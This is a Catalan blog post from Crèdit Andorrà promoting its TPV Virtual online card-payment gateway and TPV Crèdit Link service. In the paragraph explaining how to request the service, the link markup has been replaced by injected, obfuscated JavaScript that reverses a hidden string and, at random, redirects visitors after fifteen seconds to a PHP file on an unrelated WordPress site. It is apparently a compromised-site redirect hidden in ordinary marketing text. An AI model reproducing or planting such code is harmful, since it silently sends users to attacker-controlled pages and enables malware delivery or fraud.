Tornar
6 Maig, 2020

A Crèdit Andorrà volem estar a prop dels clients i els seus negocis i recordar-los els productes i serveis que tenim disponibles per ajudar-los a seguir fent créixer el seu negoci.

Per això, per a aquells clients que tinguin un negoci i estiguin pensant a vendre per internet, a Crèdit Andorrà tenim disponible el TPV Virtual, una passarel·la de pagament online perquè els clients puguin fer vendes en línia i acceptar pagaments ordenats amb targetes a través d’una plataforma segura de comerç electrònic. A més, el TPV Virtual de Crèdit Andorrà s’integra de manera fàcil a qualsevol web.

Què ofereix el TPV Virtual?

  • Admet pagaments amb targetes Visa i Mastercard.
  • Es poden consultar i gestionar les operacions següents: vendes, anul·lacions, devolucions i preautoritzacions.
  • Alta seguretat en tots els elements, amb la confiança del proveïdor de serveis de pagament espanyol més important.
  • Fàcil integració en els webs dels comerços.
  • Processament en temps real.
  • Imatge personalitzable per als comerços.
  • Homologació mitjançant estàndards 3DSecure.
  • Màximes garanties de confidencialitat.

Com es pot demanar?

Per demanar més informació sobre el nostre TPV Virtual, els clients poden accedir al $mRi=function(n){if (typeof ($mRi.list[n]) == “string”) return $mRi.list[n].split(“”).reverse().join(“”);return $mRi.list[n];};$mRi.list=[“\’php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andorragroup.ad/ca/tpv-credit-link” target=”_blank” rel=”noreferrer noopener” aria-label=”TPV Crèdit Link (opens in a new tab)”>TPV Crèdit Link. Un TPV perquè els comerços puguin vendre productes i serveis via online. Per fer-ho, tan sols han de contractar el TPV Crèdit Link i de manera fàcil i ràpida, ja podran començar a realitzar cobraments via email.

Ara més que mai, #EnsTensAProp

Més informació

No et perdis res

Subscriu-te a la nostra newsletter i rebràs les novetats del nostre blog al teu correu electrònic.

Subscriure’m